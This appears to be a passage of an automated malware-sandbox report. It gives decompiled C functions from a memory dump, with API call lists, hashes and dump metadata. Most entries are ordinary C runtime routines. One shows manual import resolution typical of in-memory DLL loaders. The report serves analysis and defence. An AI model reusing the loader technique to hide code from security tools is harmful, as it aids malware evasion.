                                                      • Opcode ID: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                                      • Instruction ID: 4d06972f43a844bfa3949195b83d417bb95582cf177f034ad1b947d460bfdcb6
                                                      • Opcode Fuzzy Hash: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
                                                      • Instruction Fuzzy Hash: B641E175500B099BF724CB68CC91E6A77E4EF453E1F10861DE8A6876D9E774FD808B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E10005033(void* __eflags, signed char _a4, intOrPtr* _a8) {
                                                      				signed int _v8;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t43;
                                                      				signed int _t44;
                                                      				signed int _t45;
                                                      				signed int _t48;
                                                      				signed int _t52;
                                                      				void* _t60;
                                                      				signed int _t62;
                                                      				void* _t64;
                                                      				signed int _t67;
                                                      				signed int _t70;
                                                      				signed int _t74;
                                                      				signed int _t76;
                                                      				void* _t77;
                                                      				signed int _t85;
                                                      				void* _t86;
                                                      				signed int _t87;
                                                      				signed int _t89;
                                                      				intOrPtr* _t92;
                                                      
                                                      				_t44 = E100076DE(_t43);
                                                      				if(_t44 >= 0) {
                                                      					_t92 = _a8;
                                                      					_t45 = E100095F8(_t92);
                                                      					_t2 = _t92 + 0xc; // 0x66ce7cf0
                                                      					_t74 =  *_t2;
                                                      					_t89 = _t45;
                                                      					__eflags = _t74 & 0x00000082;
                                                      					if((_t74 & 0x00000082) != 0) {
                                                      						__eflags = _t74 & 0x00000040;
                                                      						if((_t74 & 0x00000040) == 0) {
                                                      							_t70 = 0;
                                                      							__eflags = _t74 & 0x00000001;
                                                      							if((_t74 & 0x00000001) == 0) {
                                                      								L10:
                                                      								_t16 = _t92 + 0xc; // 0x66ce7cf0
                                                      								_t48 =  *_t16 & 0xffffffef | 0x00000002;
                                                      								 *(_t92 + 0xc) = _t48;
                                                      								 *(_t92 + 4) = _t70;
                                                      								__eflags = _t48 & 0x0000010c;
                                                      								if((_t48 & 0x0000010c) == 0) {
                                                      									_t60 = E1000951C();
                                                      									__eflags = _t92 - _t60 + 0x20;
                                                      									if(_t92 == _t60 + 0x20) {
                                                      										L13:
                                                      										_t62 = E1000961C(_t89);
                                                      										__eflags = _t62;
                                                      										if(_t62 == 0) {
                                                      											goto L14;
                                                      										}
                                                      									} else {
                                                      										_t64 = E1000951C();
                                                      										__eflags = _t92 - _t64 + 0x40;
                                                      										if(_t92 != _t64 + 0x40) {
                                                      											L14:
                                                      											E1000A133(_t92);
                                                      										} else {
                                                      											goto L13;
                                                      										}
                                                      									}
                                                      								}
                                                      								__eflags =  *(_t92 + 0xc) & 0x00000108;
                                                      								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
                                                      									__eflags = 1;
                                                      									_push(1);
                                                      									_v8 = 1;
                                                      									_push( &_a4);
                                                      									_push(_t89);
                                                      									_t45 = E10009680(_t70, _t86, _t89, _t92, 1);
                                                      									_t70 = _t45;
                                                      									goto L27;
                                                      								} else {
                                                      									_t24 = _t92 + 8; // 0x753b46c6
                                                      									_t87 =  *_t24;
                                                      									_t25 = _t87 + 1; // 0x753b46c7
                                                      									 *_t92 = _t25;
                                                      									_t26 = _t92 + 0x18; // 0x8b0d78fe
                                                      									_t76 =  *_t92 - _t87;
                                                      									_v8 = _t76;
                                                      									 *(_t92 + 4) =  *_t26 - 1;
                                                      									__eflags = _t76;
                                                      									if(__eflags <= 0) {
                                                      										__eflags = _t89 - 0xffffffff;
                                                      										if(_t89 == 0xffffffff) {
                                                      											L22:
                                                      											_t77 = 0x10012340;
                                                      										} else {
                                                      											__eflags = _t89 - 0xfffffffe;
                                                      											if(_t89 == 0xfffffffe) {
                                                      												goto L22;
                                                      											} else {
                                                      												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t89 >> 5) * 4));
                                                      											}
                                                      										}
                                                      										__eflags =  *(_t77 + 4) & 0x00000020;
                                                      										if(__eflags == 0) {
                                                      											goto L25;
                                                      										} else {
                                                      											_push(2);
                                                      											_push(_t70);
                                                      											_push(_t70);
                                                      											_push(_t89);
                                                      											_t45 = E10009FB9(_t70, _t89, _t92, __eflags) & _t87;
                                                      											__eflags = _t45 - 0xffffffff;
                                                      											if(_t45 == 0xffffffff) {
                                                      												goto L28;
                                                      											} else {
                                                      												goto L25;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										_push(_t76);
                                                      										_push(_t87);
                                                      										_push(_t89);
                                                      										_t70 = E10009680(_t70, _t87, _t89, _t92, __eflags);
                                                      										L25:
                                                      										_t35 = _t92 + 8; // 0x753b46c6
                                                      										_t45 = _a4;
                                                      										 *( *_t35) = _t45;
                                                      										L27:
                                                      										__eflags = _t70 - _v8;
                                                      										if(_t70 == _v8) {
                                                      											_t52 = _a4 & 0x000000ff;
                                                      										} else {
                                                      											L28:
                                                      											_t40 = _t92 + 0xc;
                                                      											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
                                                      											__eflags =  *_t40;
                                                      											goto L29;
                                                      										}
                                                      									}
                                                      								}
                                                      							} else {
                                                      								 *(_t92 + 4) = 0;
                                                      								__eflags = _t74 & 0x00000010;
                                                      								if((_t74 & 0x00000010) == 0) {
                                                      									 *(_t92 + 0xc) = _t74 | 0x00000020;
                                                      									L29:
                                                      									_t52 = _t45 | 0xffffffff;
                                                      								} else {
                                                      									_t14 = _t92 + 8; // 0x753b46c6
                                                      									_t85 = _t74 & 0xfffffffe;
                                                      									__eflags = _t85;
                                                      									 *_t92 =  *_t14;
                                                      									 *(_t92 + 0xc) = _t85;
                                                      									goto L10;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t67 = E10005EC6();
                                                      							 *_t67 = 0x22;
                                                      							goto L6;
                                                      						}
                                                      					} else {
                                                      						_t67 = E10005EC6();
                                                      						 *_t67 = 9;
                                                      						L6:
                                                      						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
                                                      						_t52 = _t67 | 0xffffffff;
                                                      					}
                                                      					return _t52;
                                                      				} else {
                                                      					return _t44 | 0xffffffff;
                                                      				}
                                                      			}


                                                      APIs
                                                      • __ioinit.LIBCMT ref: 10005037
                                                        • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Once$ExecuteInit__ioinit
                                                      • String ID:
                                                      • API String ID: 129814473-0
                                                      • Opcode ID: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                                      • Instruction ID: 32086827ce60b9a2cbb99d25a0e80922b058c4e771a23cab2cd98d30bef894a1
                                                      • Opcode Fuzzy Hash: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
                                                      • Instruction Fuzzy Hash: 4A41F171900B059FF324CF68C851BAB77E4DF453E2B10871DE8B6C62D9E676E9408B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E10004A66(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                      				char* _v16;
                                                      				char _v28;
                                                      				signed char _v32;
                                                      				void* _t10;
                                                      				void* _t19;
                                                      				intOrPtr* _t22;
                                                      				void* _t24;
                                                      				void* _t25;
                                                      				intOrPtr* _t27;
                                                      
                                                      				_t25 = __edi;
                                                      				_t24 = __edx;
                                                      				_t19 = __ebx;
                                                      				while(1) {
                                                      					_t10 = E10008E67(_t19, _t24, _t25, _a4);
                                                      					if(_t10 != 0) {
                                                      						break;
                                                      					}
                                                      					if(E10009026(_t10, _a4) == 0) {
                                                      						_push(1);
                                                      						_t22 =  &_v28;
                                                      						_v16 = "bad allocation";
                                                      						E10008F1E(_t22,  &_v16);
                                                      						_v28 = 0x1000e460;
                                                      						E10009059( &_v28, 0x10010b04);
                                                      						asm("int3");
                                                      						_t27 = _t22;
                                                      						 *_t27 = 0x1000e460;
                                                      						E10008F5C(_t22);
                                                      						if((_v32 & 0x00000001) != 0) {
                                                      							L10003800(_t27);
                                                      						}
                                                      						return _t27;
                                                      					} else {
                                                      						continue;
                                                      					}
                                                      					L7:
                                                      				}
                                                      				return _t10;
                                                      				goto L7;
                                                      			}


                                                      APIs
                                                      • _malloc.LIBCMT ref: 10004A7E
                                                        • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                                        • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                                        • Part of subcall function 10008E67: HeapAlloc.KERNEL32(00640000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                                      • std::exception::exception.LIBCMT ref: 10004A9A
                                                      • __CxxThrowException@8.LIBCMT ref: 10004AAF
                                                        • Part of subcall function 10009059: RaiseException.KERNEL32(?,?,?,10010B04,?,?,?,10004AB4,?,10010B04,00000000,00000001), ref: 100090AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                      • String ID: `$h
                                                      • API String ID: 1059622496-773005782
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E1000B39B(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                      				void* _t7;
                                                      				void* _t8;
                                                      				intOrPtr* _t9;
                                                      				intOrPtr* _t12;
                                                      				void* _t20;
                                                      				long _t31;
                                                      
                                                      				if(_a4 != 0) {
                                                      					_t31 = _a8;
                                                      					if(_t31 != 0) {
                                                      						_push(__ebx);
                                                      						while(_t31 <= 0xffffffe0) {
                                                      							if(_t31 == 0) {
                                                      								_t31 = _t31 + 1;
                                                      							}
                                                      							_t7 = HeapReAlloc( *0x100132fc, 0, _a4, _t31);
                                                      							_t20 = _t7;
                                                      							if(_t20 != 0) {
                                                      								L17:
                                                      								_t8 = _t20;
                                                      							} else {
                                                      								if( *0x10013c2c == _t7) {
                                                      									_t9 = E10005EC6();
                                                      									 *_t9 = E10005ED9(GetLastError());
                                                      									goto L17;
                                                      								} else {
                                                      									if(E10009026(_t7, _t31) == 0) {
                                                      										_t12 = E10005EC6();
                                                      										 *_t12 = E10005ED9(GetLastError());
                                                      										L12:
                                                      										_t8 = 0;
                                                      									} else {
                                                      										continue;
                                                      									}
                                                      								}
                                                      							}
                                                      							goto L14;
                                                      						}
                                                      						E10009026(_t6, _t31);
                                                      						 *((intOrPtr*)(E10005EC6())) = 0xc;
                                                      						goto L12;
                                                      					} else {
                                                      						E10004732(_a4);
                                                      						_t8 = 0;
                                                      					}
                                                      					L14:
                                                      					return _t8;
                                                      				} else {
                                                      					return E10008E67(__ebx, __edx, __edi, _a8);
                                                      				}
                                                      			}










                                                      APIs
                                                      • _malloc.LIBCMT ref: 1000B3A7
                                                        • Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
                                                        • Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
                                                        • Part of subcall function 10008E67: HeapAlloc.KERNEL32(00640000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA
                                                      • _free.LIBCMT ref: 1000B3BA
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: AllocHeap_free_malloc
                                                      • String ID:
                                                      • API String ID: 2734353464-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E1000883C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				LONG* _t20;
                                                      				signed int _t25;
                                                      				void* _t29;
                                                      				void* _t31;
                                                      				LONG* _t33;
                                                      				void* _t34;
                                                      
                                                      				_t29 = __edx;
                                                      				_t24 = __ebx;
                                                      				_push(0xc);
                                                      				_push(0x10010da8);
                                                      				E10008040(__ebx, __edi, __esi);
                                                      				_t31 = E10006087();
                                                      				_t25 =  *0x10012ae4; // 0xfffffffe
                                                      				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                      					E100091AB(0xd);
                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                      					_t33 =  *(_t31 + 0x68);
                                                      					 *(_t34 - 0x1c) = _t33;
                                                      					__eflags = _t33 -  *0x10012394; // 0x10012690
                                                      					if(__eflags != 0) {
                                                      						__eflags = _t33;
                                                      						if(__eflags != 0) {
                                                      							__eflags = InterlockedDecrement(_t33);
                                                      							if(__eflags == 0) {
                                                      								__eflags = _t33 - 0x10012690;
                                                      								if(__eflags != 0) {
                                                      									E10004732(_t33);
                                                      								}
                                                      							}
                                                      						}
                                                      						_t20 =  *0x10012394; // 0x10012690
                                                      						 *(_t31 + 0x68) = _t20;
                                                      						_t33 =  *0x10012394; // 0x10012690
                                                      						 *(_t34 - 0x1c) = _t33;
                                                      						InterlockedIncrement(_t33);
                                                      					}
                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                      					E100088D8();
                                                      				} else {
                                                      					_t33 =  *(_t31 + 0x68);
                                                      				}
                                                      				_t38 = _t33;
                                                      				if(_t33 == 0) {
                                                      					E1000743E(_t24, _t29, _t31, _t33, _t38, 0x20);
                                                      				}
                                                      				return E10008085(_t33);
                                                      			}










                                                      APIs
                                                        • Part of subcall function 10006087: __getptd_noexit.LIBCMT ref: 10006088
                                                        • Part of subcall function 10006087: __amsg_exit.LIBCMT ref: 10006095
                                                      • __amsg_exit.LIBCMT ref: 10008869
                                                      • __lock.LIBCMT ref: 10008879
                                                      • InterlockedDecrement.KERNEL32(?), ref: 10008896
                                                      • _free.LIBCMT ref: 100088A9
                                                      • InterlockedIncrement.KERNEL32(10012690), ref: 100088C1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                                      • String ID:
                                                      • API String ID: 1231874560-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 48%
                                                      			E10001470(void* __ecx, intOrPtr* _a4) {
                                                      				intOrPtr _v8;
                                                      				void* _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _t44;
                                                      				signed short _t56;
                                                      				signed int _t58;
                                                      				intOrPtr _t60;
                                                      				intOrPtr _t64;
                                                      				intOrPtr _t65;
                                                      				void* _t67;
                                                      				intOrPtr* _t68;
                                                      				intOrPtr _t70;
                                                      				void _t71;
                                                      				signed short* _t72;
                                                      				intOrPtr _t73;
                                                      				intOrPtr _t77;
                                                      				intOrPtr* _t78;
                                                      				intOrPtr _t79;
                                                      				intOrPtr _t80;
                                                      				signed short* _t82;
                                                      				void* _t84;
                                                      				void* _t85;
                                                      
                                                      				_t78 = _a4;
                                                      				_t65 =  *_t78;
                                                      				_t2 = _t78 + 4; // 0x4d8d5010
                                                      				_t79 =  *_t2;
                                                      				_a4 = _t79;
                                                      				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
                                                      					L22:
                                                      					return 1;
                                                      				} else {
                                                      					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t79;
                                                      					_v12 = _t67;
                                                      					if(IsBadReadPtr(_t67, 0x14) == 0) {
                                                      						while(1) {
                                                      							_t44 =  *((intOrPtr*)(_t67 + 0xc));
                                                      							if(_t44 == 0) {
                                                      								goto L22;
                                                      							}
                                                      							_t8 = _t78 + 0x28; // 0x12f7805
                                                      							_t9 = _t78 + 0x1c; // 0xe58b0000
                                                      							_t80 =  *((intOrPtr*)( *_t9))(_t44 + _t79,  *_t8);
                                                      							_t85 = _t84 + 8;
                                                      							_v8 = _t80;
                                                      							if(_t80 == 0) {
                                                      								SetLastError(0x7e);
                                                      								return 0;
                                                      							} else {
                                                      								_t11 = _t78 + 0xc; // 0xd0ff0000
                                                      								_t14 = _t78 + 8; // 0x637e8ef
                                                      								_t70 = E10001DD0( *_t14, 4 +  *_t11 * 4);
                                                      								_t84 = _t85 + 8;
                                                      								if(_t70 == 0) {
                                                      									_t40 = _t78 + 0x28; // 0x12f7805
                                                      									_t41 = _t78 + 0x24; // 0x39c033cc
                                                      									 *((intOrPtr*)( *_t41))(_t80,  *_t40);
                                                      									SetLastError(0xe);
                                                      									return 0;
                                                      								} else {
                                                      									_t15 = _t78 + 0xc; // 0xd0ff0000
                                                      									 *((intOrPtr*)(_t78 + 8)) = _t70;
                                                      									_t77 = _t80;
                                                      									 *((intOrPtr*)(_t70 +  *_t15 * 4)) = _t77;
                                                      									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
                                                      									_t71 =  *_t67;
                                                      									if(_t71 == 0) {
                                                      										_t82 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
                                                      										_t72 = _t82;
                                                      									} else {
                                                      										_t64 = _a4;
                                                      										_t82 = _t71 + _t64;
                                                      										_t72 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
                                                      									}
                                                      									_t56 =  *_t82;
                                                      									if(_t56 == 0) {
                                                      										L17:
                                                      										_t67 = _t67 + 0x14;
                                                      										_v12 = _t67;
                                                      										if(IsBadReadPtr(_t67, 0x14) != 0) {
                                                      											goto L22;
                                                      										} else {
                                                      											_t79 = _a4;
                                                      											continue;
                                                      										}
                                                      									} else {
                                                      										_t73 = _t72 - _t82;
                                                      										_v16 = _t73;
                                                      										while(1) {
                                                      											_t27 = _t78 + 0x28; // 0x12f7805
                                                      											_push( *_t27);
                                                      											_t68 = _t73 + _t82;
                                                      											if(_t56 >= 0) {
                                                      												_t58 = _t56 + _a4 + 2;
                                                      											} else {
                                                      												_t58 = _t56 & 0x0000ffff;
                                                      											}
                                                      											_t30 = _t78 + 0x20; // 0xccccc35d
                                                      											_t60 =  *((intOrPtr*)( *_t30))(_t77, _t58);
                                                      											_t84 = _t84 + 0xc;
                                                      											 *_t68 = _t60;
                                                      											if(_t60 == 0) {
                                                      												break;
                                                      											}
                                                      											_t56 = _t82[2];
                                                      											_t73 = _v16;
                                                      											_t77 = _v8;
                                                      											_t82 =  &(_t82[2]);
                                                      											if(_t56 != 0) {
                                                      												continue;
                                                      											} else {
                                                      												_t67 = _v12;
                                                      												goto L17;
                                                      											}
                                                      											goto L23;
                                                      										}
                                                      										_t37 = _t78 + 0x28; // 0x12f7805
                                                      										_t39 = _t78 + 0x24; // 0x39c033cc
                                                      										 *((intOrPtr*)( *_t39))(_v8,  *_t37);
                                                      										SetLastError(0x7f);
                                                      										return 0;
                                                      									}
                                                      								}
                                                      							}
                                                      							goto L23;
                                                      						}
                                                      					}
                                                      					goto L22;
                                                      				}
                                                      				L23:
                                                      			}

                                                      APIs
                                                      • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,100013CB), ref: 1000149F
                                                      • SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100015C8
                                                        • Part of subcall function 10001DD0: VirtualQuery.KERNEL32(0637E8EF,?,0000001C,100013CB,00000000,?,?,?,?,?,100014E9,0637E8EF,D0FF0000), ref: 10001DEA
                                                      • IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80), ref: 10001573
                                                      • SetLastError.KERNEL32(0000007F), ref: 10001596
                                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB), ref: 100015B5
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: ErrorLast$Read$QueryVirtual
                                                      • String ID:
                                                      • API String ID: 4108280708-0
                                                      • Opcode ID: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                                      • Instruction ID: a489c81f2b48b45f7abe8d82c2fa530717afe034d23ef7191f16fae001b152d3
                                                      • Opcode Fuzzy Hash: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                                      • Instruction Fuzzy Hash: 02415E71600619EBEB10CF59DC80B99B7A8FF483A5F04416AED0ADB705D731E961CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E1000A35A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				int _v20;
                                                      				int _t35;
                                                      				int _t38;
                                                      				int _t42;
                                                      				intOrPtr* _t44;
                                                      				int _t47;
                                                      				short* _t49;
                                                      				intOrPtr _t50;
                                                      				intOrPtr _t54;
                                                      				int _t55;
                                                      				int _t59;
                                                      				char* _t62;
                                                      
                                                      				_t62 = _a8;
                                                      				if(_t62 == 0) {
                                                      					L5:
                                                      					return 0;
                                                      				}
                                                      				_t50 = _a12;
                                                      				if(_t50 == 0) {
                                                      					goto L5;
                                                      				}
                                                      				if( *_t62 != 0) {
                                                      					E1000476A( &_v20, _a16);
                                                      					_t35 = _v20;
                                                      					__eflags =  *(_t35 + 0xa8);
                                                      					if( *(_t35 + 0xa8) != 0) {
                                                      						_t38 = E1000A179( *_t62 & 0x000000ff,  &_v20);
                                                      						__eflags = _t38;
                                                      						if(_t38 == 0) {
                                                      							__eflags = _a4;
                                                      							_t59 = 1;
                                                      							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                      							__eflags = _t42;
                                                      							if(_t42 != 0) {
                                                      								L21:
                                                      								__eflags = _v8;
                                                      								if(_v8 != 0) {
                                                      									_t54 = _v12;
                                                      									_t31 = _t54 + 0x70;
                                                      									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                      									__eflags =  *_t31;
                                                      								}
                                                      								return _t59;
                                                      							}
                                                      							L20:
                                                      							_t44 = E10005EC6();
                                                      							_t59 = _t59 | 0xffffffff;
                                                      							__eflags = _t59;
                                                      							 *_t44 = 0x2a;
                                                      							goto L21;
                                                      						}
                                                      						_t59 = _v20;
                                                      						__eflags =  *(_t59 + 0x74) - 1;
                                                      						if( *(_t59 + 0x74) <= 1) {
                                                      							L15:
                                                      							__eflags = _t50 -  *(_t59 + 0x74);
                                                      							L16:
                                                      							if(__eflags < 0) {
                                                      								goto L20;
                                                      							}
                                                      							__eflags = _t62[1];
                                                      							if(_t62[1] == 0) {
                                                      								goto L20;
                                                      							}
                                                      							L18:
                                                      							_t59 =  *(_t59 + 0x74);
                                                      							goto L21;
                                                      						}
                                                      						__eflags = _t50 -  *(_t59 + 0x74);
                                                      						if(__eflags < 0) {
                                                      							goto L16;
                                                      						}
                                                      						__eflags = _a4;
                                                      						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                      						_t59 = _v20;
                                                      						__eflags = _t47;
                                                      						if(_t47 != 0) {
                                                      							goto L18;
                                                      						}
                                                      						goto L15;
                                                      					}
                                                      					_t55 = _a4;
                                                      					__eflags = _t55;
                                                      					if(_t55 != 0) {
                                                      						 *_t55 =  *_t62 & 0x000000ff;
                                                      					}
                                                      					_t59 = 1;
                                                      					goto L21;
                                                      				}
                                                      				_t49 = _a4;
                                                      				if(_t49 != 0) {
                                                      					 *_t49 = 0;
                                                      				}
                                                      				goto L5;
                                                      			}

                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A38E
                                                      • __isleadbyte_l.LIBCMT ref: 1000A3BC
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A3EA
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A420
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                                      • Instruction ID: 9d1cf0849eee1a075b18554553a91368e22c05569ceb8c6a927f46b954fbfb1a
                                                      • Opcode Fuzzy Hash: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                                      • Instruction Fuzzy Hash: 6231B035A00256AFEB11CF65C848BAE7BE5FF822D0F124628F850871A4E770E9D1DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E10006610(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                      				void* __edi;
                                                      				void* __ebp;
                                                      				void* _t25;
                                                      				void* _t28;
                                                      				intOrPtr _t29;
                                                      				void* _t30;
                                                      				intOrPtr* _t31;
                                                      				void* _t33;
                                                      
                                                      				_t30 = __esi;
                                                      				_t27 = __ebx;
                                                      				_t35 = _a28;
                                                      				_t29 = _a8;
                                                      				if(_a28 != 0) {
                                                      					_push(_a28);
                                                      					_push(_a24);
                                                      					_push(_t29);
                                                      					_push(_a4);
                                                      					E10006C38(__ebx, _t29, __esi, _t35);
                                                      					_t33 = _t33 + 0x10;
                                                      				}
                                                      				_t36 = _a40;
                                                      				_push(_a4);
                                                      				if(_a40 != 0) {
                                                      					_push(_a40);
                                                      				} else {
                                                      					_push(_t29);
                                                      				}
                                                      				E100042B0(_t28);
                                                      				_push(_t30);
                                                      				_t31 = _a32;
                                                      				_push( *_t31);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_t29);
                                                      				E10006E99(_t27, _t31, _t36);
                                                      				_push(0x100);
                                                      				_push(_a36);
                                                      				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
                                                      				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                      				_push(_a20);
                                                      				_push(_a12);
                                                      				_push(_t29);
                                                      				_push(_a4);
                                                      				_t25 = E10006402(_t27, _t29, _t31, _t36);
                                                      				if(_t25 != 0) {
                                                      					E10004280(_t25, _t29);
                                                      					return _t25;
                                                      				}
                                                      				return _t25;
                                                      			}

                                                      APIs
                                                      • ___BuildCatchObject.LIBCMT ref: 10006627
                                                        • Part of subcall function 10006C38: ___AdjustPointer.LIBCMT ref: 10006C81
                                                      • _UnwindNestedFrames.LIBCMT ref: 1000663E
                                                      • ___FrameUnwindToState.LIBCMT ref: 10006650
                                                      • CallCatchBlock.LIBCMT ref: 10006674
                                                      Memory Dump Source
